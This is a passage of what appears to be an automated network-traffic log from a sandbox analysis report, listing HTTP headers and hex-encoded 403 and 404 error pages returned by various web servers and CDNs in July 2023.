64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 27 Jul 2023 19:44:25 GMTContent-Type: text/html; charset=UTF-8Content-Length: 0Connection: keep-aliveX-Sorting-Hat-PodId: 171X-Sorting-Hat-ShopId: 61843439788Server-Timing: processing;dur=18X-Shopify-Stage: productionX-Content-Type-Options: nosniffX-Download-Options: noopenX-Permitted-Cross-Domain-Policies: noneX-XSS-Protection: 1; mode=blockX-Dc: gcp-europe-west3,gcp-us-central1,gcp-us-central1X-Request-ID: dea54225-38bc-4454-9e8a-4a97701c8395CF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=LPmeLA4pox3G9qwChA9zhYwh9UwQgfEiFnnmsPMmz7BFByFlQyIsLE5amKZJ4C9vTmz3Gk7loB8yAEMGzjHEZFYKW4xz1xV6OnrykiLAnGQOZ4w24L15TmjxRw6CdURx4w%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}Server-Timing: cfRequestDuration;dur=150.999784Server: cloudflareCF-RAY: 7ed760814bfd912b-FRAalt-svc: h3=":443"; ma=86400
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 27 Jul 2023 19:44:26 GMTContent-Type: text/html; charset=UTF-8Content-Length: 0Connection: keep-aliveX-Sorting-Hat-PodId: 216X-Sorting-Hat-ShopId: 66042101977Server-Timing: processing;dur=18X-Shopify-Stage: productionX-Content-Type-Options: nosniffX-Download-Options: noopenX-Permitted-Cross-Domain-Policies: noneX-XSS-Protection: 1; mode=blockX-Dc: gcp-europe-west3,gcp-us-central1,gcp-us-central1X-Request-ID: 6802f529-3793-42ea-83e5-bcd5f14427b0CF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=3C7gbDTljnPd3cW5FZk8LFftmSP07Ha15G2u5L6fQjPHYhsJSv3sBAZfOR0vEoQWvqC20qd8hZG6p2N%2BlmG5wAMFi98wJRc35xfvi%2Fua26F2mZksW2W6rV0OKkxr3vE%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}Server-Timing: cfRequestDuration;dur=149.000168Server: cloudflareCF-RAY: 7ed76082bde79295-FRAalt-svc: h3=":443"; ma=86400
                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenTransfer-Encoding: chunkedServer: Microsoft-HTTPAPI/2.0Date: Thu, 27 Jul 2023 19:44:16 GMTData Raw: 30 0d 0a 0d 0a Data Ascii: 0
                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Thu, 27 Jul 2023 19:44:26 GMTContent-Type: text/htmlContent-Length: 2843Connection: keep-aliveVary: Accept-EncodingLast-Modified: Thu, 26 Jul 2018 17:13:08 GMTETag: "b1b-571ea1be9f445"Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 6a 61 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 45 55 43 2d 4a 50 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 63 6f 70 79 72 69 67 68 74 22 20 63 6f 6e 74 65 6e 74 3d 22 43 6f 70 79 72 69 67 68 74 20 58 53 45 52 56 45 52 20 49 6e 63 2e 22 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 49 4e 44 45 58 2c 46 4f 4c 4c 4f 57 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 2c 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 2a 20 7b 0a 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 7d 0a 69 6d 67 20 7b 0a 20 20 20 20 62 6f 72 64 65 72 3a 20 30 3b 0a 7d 0a 75 6c 20 7b 0a 20 20 20 20 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 20 32 65 6d 3b 0a 7d 0a 68 74 6d 6c 20 7b 0a 20 20 20 20 6f 76 65 72 66 6c 6f 77 2d 79 3a 20 73 63 72 6f 6c 6c 3b 0a 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 33 62 37 39 62 37 3b 0a 7d 0a 62 6f 64 79 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 22 a5 e1 a5 a4 a5 ea a5 aa 22 2c 20 4d 65 69 72 79 6f 2c 20 22 a3 cd a3 d3 20 a3 d0 a5 b4 a5 b7 a5 c3 a5 af 22 2c 20 22 4d 53 20 50 47 6f 74 68 69 63 22 2c 20 22 a5 d2 a5 e9 a5 ae a5 ce b3 d1 a5 b4 20 50 72 6f 20 57 33 22 2c 20 22 48 69 72 61 67 69 6e 6f 20 4b 61 6b 75 20 47 6f 74 68 69 63 20 50 72 6f 22 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 2e 34 3b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 37 35 25 3b 0a 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 77 68 69 74 65 3b 0a 7d 0a 68 31 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 34 70 78 3b 0a 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 62 6f 6c 64 3b 0a 7d 0a 68 31 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 62 6f 6c 64 3b 0a 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 3b 0a 20 20 20 20 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 20 32 30 70 78 3b 0a 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 7d 0a 68 32 20 7b 0a 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 62 6f 6c 64
                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 27 Jul 2023 19:44:28 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: keep-aliveCache-Control: max-age=15Expires: Thu, 27 Jul 2023 19:44:43 GMTX-Frame-Options: SAMEORIGINReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=14m6aNxO6qAVCuRrRY%2BSugUOJ02%2F4rKwjmeGAqa2Yngu%2BNpPU82X9M8GFoojb1hUmTmNz6g6Yib90QSs1FdQhb2WYqbywHqM2OwAuHwNKevVY4sF7MMLmFy%2BRl7x%2FyLJ"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 7ed7608f2a5a372f-FRAData Raw: 31 31 39 66 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 67 74 20 49 45 20 38 5d 3e 3c 21 2d 2d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 41 74 74 65 6e 74 69 6f 6e 20 52 65 71 75 69 72 65 64 21 20 7c 20 43 6c 6f 75 64 66 6c 61 72 65 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 Data Ascii: 119f<!DOCTYPE html><!--[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]--><!--[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]--><!--[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]--><!--[if gt IE 8]><!--> <html class="no-js" lang="en-US"> <!--<![endif]--><head><title>Attention Required! | Cloudflare<
                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenContent-Length: 548Content-Type: text/htmlX-Wix-Request-Id: 1690487068.05999942946216994X-Content-Type-Options: nosniffServer: Pepyaka/1.19.10Accept-Ranges: bytesDate: Thu, 27 Jul 2023 19:44:28 GMTX-Served-By: cache-lin2290024-LINX-Cache: MISSX-Seen-By: yvSunuo/8ld62ehjr5B7kA==,GXNXSWFXisshliUcwO20NQ1aV/eYQaI5OrqNssi0Z4KFbPzA2w5BhcpKxGOtqn2u,qquldgcFrj2n046g4RNSVCA9lUGGSSQQI3tXitet/XU=Via: 1.1 googleData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenContent-Type: text/htmlTransfer-Encoding: chunkedConnection: keep-aliveX-Cache-Status: X-Zen-Fury: 889d03d5cd3d1809b4ec3bfee79f849d0f8866a6Server: ZENEDGECache-Control: no-storeCache-Control: no-cache, no-store, must-revalidateCache-Control: max-age=0Date: Thu, 27 Jul 2023 19:44:28 GMTData Raw: 32 61 61 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 28 66 75 6e 63 74 69 6f 6e 28 29 7b 20 69 66 20 28 74 79 70 65 6f 66 28 5f 5f 5f 7a 65 6e 29 20 3d 3d 3d 20 22 75 6e 64 65 66 69 6e 65 64 22 29 20 7b 73 65 74 54 69 6d 65 6f 75 74 28 61 72 67 75 6d 65 6e 74 73 2e 63 61 6c 6c 65 65 2c 20 35 30 29 3b 20 72 65 74 75 72 6e 3b 20 7d 5f 5f 5f 7a 65 6e 2e 68 69 63 28 22 5f 5f 5a 45 48 49 43 34 31 35 30 22 2c 20 31 36 39 30 34 38 37 30 36 38 2c 20 31 2c 20 30 2c 20 36 30 29 3b 20 7d 29 28 29 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 61 73 79 6e 63 3d 22 61 73 79 6e 63 22 20 73 72 63 3d 22 2f 5f 5f 7a 65 6e 65 64 67 65 2f 61 73 73 65 74 73 2f 68 69 63 2e 6a 73 3f 76 3d 31 36 37 34 32 30 37 34 32 32 22 3e 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 63 65 6e 74 65 72 3e 3c 64 69 76 3e 3c 68 31 3e 34 30 33 3c 2f 68 31 3e 3c 2f 64 69 76 3e 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 61 73 79 6e 63 3d 22 61 73 79 6e 63 22 20 73 72 63 3d 22 2f 5f 5f 7a 65 6e 65 64 67 65 2f 61 73 73 65 74 73 2f 66 2e 6a 73 3f 76 3d 31 36 37 34 32 30 37 34 32 32 22 3e 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 3e 28 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 20 76 61 72 20 76 20 3d 20 31 36 39 30 34 38 36 39 38 31 20 2a 20 33 2e 31 34 31 35 39 32 36 35 33 35 38 39 38 3b 20 76 20 3d 20 4d 61 74 68 2e 66 6c 6f 6f 72 28 76 29 3b 20 64 6f 63 75 6d 65 6e 74 2e 63 6f 6f 6b 69 65 20 3d 20 22 5f 5f 7a 6a 63 33 36 31 33 3d 22 2b 76 2b 22 3b 20 65 78 70 69 72 65 73 3d 54 68 75 2c 20 32 37 20 4a 75 6c 20 32 30 32 33 20 31 39 3a 34 36 3a 32 38 20 55 54 43 3b 20 70 61 74 68 3d 2f 22 3b 20 7d 29 28 29 3c 2f 73 63 72 69 70 74 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: 2aa<html><head><title>403 Forbidden</title><script type="text/javascript">(function(){ if (typeof(___zen) === "undefined") {setTimeout(arguments.callee, 50); return; }___zen.hic("__ZEHIC4150", 1690487068, 1, 0, 60); })()</script><script type="text/javascript" async="async" src="/__zenedge/assets/hic.js?v=1674207422"></script></head><body><center><div><h1>403</h1></div><h1>Forbidden</h1></center><script type="text/javascript" async="async" src="/__zenedge/assets/f.js?v=1674207422"></script><script>(function () { var v = 1690486981 * 3.1415926535898; v = Math.floor(v); do
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 27 Jul 2023 19:44:28 GMTContent-Type: text/htmlContent-Length: 19268Connection: keep-aliveServer: ApacheLast-Modified: Fri, 13 May 2022 08:04:11 GMTAccept-Ranges: bytesData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 6a 61 22 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 45 72 72 6f 72 20 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 20 20 68 74 6d 6c 2c 62 6f 64 79 2c 68 31 2c 70 20 7b 0a 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 62 6f 64 79 2c 68 74 6d 6c 20 7b 0a 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3a 20 31 30 30 25 3b 0a 20 20 20 20 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 2d 61 70 70 6c 65 2d 73 79 73 74 65 6d 2c 20 42 6c 69 6e 6b 4d 61 63 53 79 73 74 65 6d 46 6f 6e 74 2c 20 59 61 6b 75 48 61 6e 4a 50 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 e3 83 92 e3 83 a9 e3 82 ae e3 83 8e e8 a7 92 e3 82 b4 e3 82 b7 e3 83 83 e3 82 af 2c 20 22 48 69 72 61 67 69 6e 6f 20 53 61 6e 73 22 2c 20 22 e3 83 92 e3 83 a9 e3 82 ae e3 83 8e e8 a7 92 e3 82 b4 20 50 72 6f 4e 20 57 33 22 2c 20 22 48 69 72 61 67 69 6e 6f 20 4b 61 6b 75 20 47 6f 74 68 69 63 20 50 72 6f 4e 22 2c 20 56 65 72 64 61 6e 61 2c 20 4d 65 69 72 79 6f 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 66 66 3b 0a 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 34 30 33 32 33 30 3b 0a 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 36 30 70 78 20 33 30 70 78 3b 0a 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 77 69 64 74 68 3a 20 36 34 30 70 78 29 20 7b 0a 20 20 20 20 20 20 20 20 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 31 30 30 70 78 20 33 30 70 78 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 68 31 20 7b 0a 20 20 20 20 20 20 20 20 6c 65 74 74 65 72 2d 73 70 61 63 69 6e 67 3a 20 30 2e 30 35 65 6d 3b 0a 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 2e 34 72 65 6d 3b 0a 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 20 32 30 70 78 3b 0a 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 61 20 7b 0a 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 31 34 37 45 46 30 3b 0a 20 20 20 20 20 20 7d 0a 2
                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: openrestyDate: Thu, 27 Jul 2023 19:44:29 GMTContent-Type: text/htmlContent-Length: 552Connection: keep-aliveVary: Accept-EncodingData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>openresty</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
